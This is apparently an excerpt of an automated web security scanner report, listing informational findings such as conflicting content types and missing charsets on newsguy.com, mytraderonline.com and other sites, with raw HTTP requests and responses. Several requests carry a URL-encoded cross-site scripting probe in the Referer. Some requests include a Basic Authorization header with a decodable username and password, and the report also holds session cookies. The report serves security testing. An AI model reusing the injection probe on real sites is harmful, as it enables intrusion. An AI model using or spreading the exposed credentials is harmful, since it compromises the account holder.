HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.36. https://www.google.com/adsense/support/bin/request.py

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D756ba543b06cbd01%26v%3D2%26c%3D8bbbe1ed%26s%3D4d3eccb4%26t%3DR%3A1%3A%26sessref%3D; Expires=Tue, 25-Jan-2011 13:44:29 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:14:29 GMT
Expires: Tue, 25 Jan 2011 13:14:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...

28.37. https://www.mytraderonline.com/css/promoCSS.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/promoCSS.php

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921266915%7C1298513266915%3B%20s_lv%3D1295921266917%7C1390529266917%3B%20s_lv_s%3DFirst%2520Visit%7C1295923066917%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:55 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 4589
Connection: close
Content-Type: text/html


/***********************
   PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('/img/tol-designtol/gradient-179px-tile.jpg?') 0 0 repeat-
...[SNIP]...

28.38. https://www.mytraderonline.com/css/tolhomecss.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/tolhomecss.php

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 8747

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

28.39. https://www.mytraderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/master_s_code.js

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32370

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...

28.40. https://www.mytraderonline.com/javascript/realmedia.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/realmedia.js

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 2571
Connection: close
Content-Type: text/html


   // Instantiate the real media variables
   var oas='https://oasc05.247realmedia.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Fun
...[SNIP]...

29. Multiple content types specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:
  • Content-Type: text/plain; charset=UTF-8
  • text/html; charset=UTF-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET / HTTP/1.1
Host: ads.doclix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFdWzI0LTEtMjAxMXwzMTA4fDFdWzI0LTEtMjAxMXwyOTAxfDFd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDFdWzUtMjAxMXwzMTA4fDFdWzUtMjAxMXwyOTAxfDFd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDFdWzEtMjAxMXwzMTA4fDFdWzEtMjAxMXwyOTAxfDFd;

Response

HTTP/1.1 404 /
Date: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 212

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DOCLIX - Page Not Found!</title></head><body><h3>Sorry, but the page you have requested has not been found.</h3></
...[SNIP]...

30. HTML does not specify charset
There are 166 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


30.1. https://acc.newsguy.com/a/memsubmit.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /a/memsubmit.asp

Request

GET /a/memsubmit.asp HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
Set-Cookie: DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
Content-Length: 5174
Expires: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>NewsGuy - Membership Drive</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsgroup messages
...[SNIP]...

30.2. https://acc.newsguy.com/cgi-bin/login_frm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/login_frm

Request

GET /cgi-bin/login_frm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:52:59 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>

<head>
<title>Newsguy - Login to Newsguy</title>
<meta NAME="description" CONTENT="Access to Usenet Newsgroups, Email accounts, Web space,
Software, Archives, Art & Music Galleries, Feature co
...[SNIP]...

30.3. https://acc.newsguy.com/cgi-bin/ngexpress_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/ngexpress_form

Request

GET /cgi-bin/ngexpress_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsguy Express Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, fea
...[SNIP]...

30.4. https://acc.newsguy.com/cgi-bin/sub_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Request

GET /cgi-bin/sub_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

30.5. https://acc.newsguy.com/cgi-bin/sub_spot_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_spot_form

Request

GET /cgi-bin/sub_spot_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:32 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Spot Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active {
text-decor
...[SNIP]...

30.6. https://acc.newsguy.com/cgi-bin/sub_trial_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_trial_form

Request

GET /cgi-bin/sub_trial_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Free 14 Day Trial Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active
...[SNIP]...

30.7. https://acc.newsguy.com/cgi-bin/sub_unlmt_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_unlmt_form

Request

GET /cgi-bin/sub_unlmt_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

30.8. https://acc.newsguy.com/cgi-bin/usenetports

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/usenetports

Request

GET /cgi-bin/usenetports HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:28 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>
<head>
<title>Newsguy - Usenet Ports - Comprehensive Outsourcing Solutions - Signup</title>
<script language="JavaScript">
function calculate()
{
   var justnumber = /^[1-9][0-9]*$/;
   var justnu
...[SNIP]...

30.9. https://acc.newsguy.com/lotto_bonuspicks.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /lotto_bonuspicks.htm

Request

GET /lotto_bonuspicks.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:19 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20bdfd-3500-4164ead9"
Accept-Ranges: bytes
Content-Length: 13568
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

30.10. https://acc.newsguy.com/lotto_details.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /lotto_details.htm

Request

GET /lotto_details.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be15-3646-4164ead9"
Accept-Ranges: bytes
Content-Length: 13894
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

30.11. https://acc.newsguy.com/requestid.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /requestid.htm

Request

GET /requestid.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be18-be9-4164ead9"
Accept-Ranges: bytes
Content-Length: 3049
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Login / ID Lookup</title>
<meta NAME="description" CONTENT="ID Lookup for Newsguy, a leading provider of
newsgroup access
...[SNIP]...

30.12. https://acc.newsguy.com/user/-/accnt_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_billing

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

30.13. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

30.14. https://acc.newsguy.com/user/-/accnt_flash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_flash

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

30.15. https://acc.newsguy.com/user/-/accnt_history

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_history

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

30.16. https://acc.newsguy.com/user/-/customer_referrals

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/customer_referrals

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
